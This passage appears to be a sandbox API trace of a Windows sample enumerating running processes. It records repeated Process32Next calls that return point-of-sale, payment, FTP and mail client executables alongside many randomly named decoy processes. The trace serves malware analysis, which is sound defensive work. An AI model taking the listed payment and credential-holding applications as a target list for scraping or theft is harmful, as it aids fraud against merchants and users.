lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0292.073] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0292.093] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0292.095] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0292.097] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0292.098] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0292.100] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0292.102] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x594, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0292.104] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0292.105] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0292.110] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0292.111] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x100c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0292.113] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1018, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0292.114] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1028, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0292.116] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1034, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="likely-final-out.exe")) returned 1 [0292.117] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="local reality bank.exe")) returned 1 [0292.119] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="kitchen-box-instead.exe")) returned 1 [0292.124] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1058, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x9dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0292.126] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0292.128] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x127c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0292.130] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0292.131] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0292.133] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0292.134] CloseHandle (hObject=0x2134) returned 1 [0292.134] Sleep (dwMilliseconds=0x64) [0292.279] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2134 [0292.290] Process32First (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0292.291] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x79, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0292.293] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0292.295] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0292.296] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0292.298] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0292.299] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0292.300] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0292.302] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0292.303] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0292.305] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0292.306] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0292.308] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0292.310] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0292.311] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0292.313] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0292.314] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0292.316] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0292.317] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0292.319] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0292.320] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0292.321] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0292.323] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0292.421] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0292.423] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0292.425] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0292.427] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0292.428] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0292.430] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0292.432] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x838, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0292.434] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0292.435] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0292.437] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="studentbecausedemocratic.exe")) returned 1 [0292.438] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="share.exe")) returned 1 [0292.439] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="myself.exe")) returned 1 [0292.441] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="feel.exe")) returned 1 [0292.442] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="action program citizen.exe")) returned 1 [0292.444] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="reachinvolve.exe")) returned 1 [0292.445] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="question.exe")) returned 1 [0292.447] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="play hit.exe")) returned 1 [0292.448] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mean.exe")) returned 1 [0292.449] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xde0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="evening.exe")) returned 1 [0292.451] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="memory everybody nature.exe")) returned 1 [0292.452] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="structurecausebar.exe")) returned 1 [0292.454] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="good.exe")) returned 1 [0292.455] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="item study safe.exe")) returned 1 [0292.456] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="health-prove-opportunity.exe")) returned 1 [0292.458] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="break.exe")) returned 1 [0292.459] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe44, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="minute-budget-themselves.exe")) returned 1 [0292.461] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0292.462] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0292.463] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0292.485] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0292.486] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0292.488] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0292.489] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0292.491] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xea0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0292.492] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0292.494] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0292.496] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 